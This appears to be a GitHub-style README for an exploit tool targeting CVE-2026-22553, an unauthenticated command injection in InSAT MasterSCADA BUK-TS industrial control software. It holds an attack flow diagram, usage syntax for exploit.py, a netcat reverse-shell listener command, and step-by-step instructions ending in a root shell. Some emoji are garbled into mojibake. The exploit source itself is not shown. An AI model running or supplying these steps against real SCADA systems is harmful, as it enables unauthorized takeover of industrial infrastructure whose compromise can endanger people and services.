Share
## https://sploitus.com/exploit?id=FB0A9C5D-1E8F-5CAD-AEB7-2C48D4610B5E
![CVE](https://img.shields.io/badge/CVE-2026--22553-Critical-red?style=for-the-badge)
![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python)
![License](https://img.shields.io/badge/License-MIT-green?style=for-the-badge)
![Author](https://img.shields.io/badge/Author-Mohammed%20Idrees%20Banyamer-%23FF00FF?style=for-the-badge)

# InSAT MasterSCADA BUK-TS - Unauthenticated RCE
**CVE-2026-22553** | **CVSS 9.8 Critical**





## ๐Ÿ“ Description

**InSAT MasterSCADA BUK-TS** suffers from an **Unauthenticated OS Command Injection** vulnerability in the `MMadmServ` web interface. This flaw allows remote attackers to achieve **full remote code execution (RCE)** without any authentication.

- **Affected Product**: InSAT MasterSCADA BUK-TS (All versions)
- **Vulnerability Type**: OS Command Injection (CWE-78)
- **Severity**: Critical (CVSS v3.1 Score: 9.8)
- **Exploit Author**: [Mohammed Idrees Banyamer](https://github.com/mbanyamer)
- **Country**: Jordan ๐Ÿ‡ฏ๐Ÿ‡ด

---

## ๐Ÿ› ๏ธ Attack Method Diagram

```mermaid
flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp ]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff
```

---

## ๐Ÿš€ Usage

```bash
python3 exploit.py  --lhost  --lport 
```

### Example

```bash
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
```

### Options

| Option     | Description                        |
|------------|------------------------------------|
| `target`   | Target URL (e.g. http://ip:port)   |
| `--lhost`  | Your IP address (reverse shell)    |
| `--lport`  | Your listening port                |

---

## ๐Ÿ“Œ How to Use

1. Start a listener on your machine:
   ```bash
   nc -lvnp 4444
   ```

2. Run the exploit:
   ```bash
   python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
   ```

3. Get a reverse shell with **root/system privileges**.

---

## โš ๏ธ Disclaimer

> This exploit is provided for **educational and authorized penetration testing purposes only**.  
> Unauthorized use against systems you do not own is **illegal** and may violate international laws.  
> The author is not responsible for any misuse.

---

## ๐Ÿ“ฌ Author

**Mohammed Idrees Banyamer**  
- Instagram: [@banyamer_security](https://www.instagram.com/banyamer_security)  
- GitHub: [mbanyamer](https://github.com/mbanyamer)  
- Country: Jordan ๐Ÿ‡ฏ๐Ÿ‡ด

---

**Star โญ this repository if you found it useful!**


```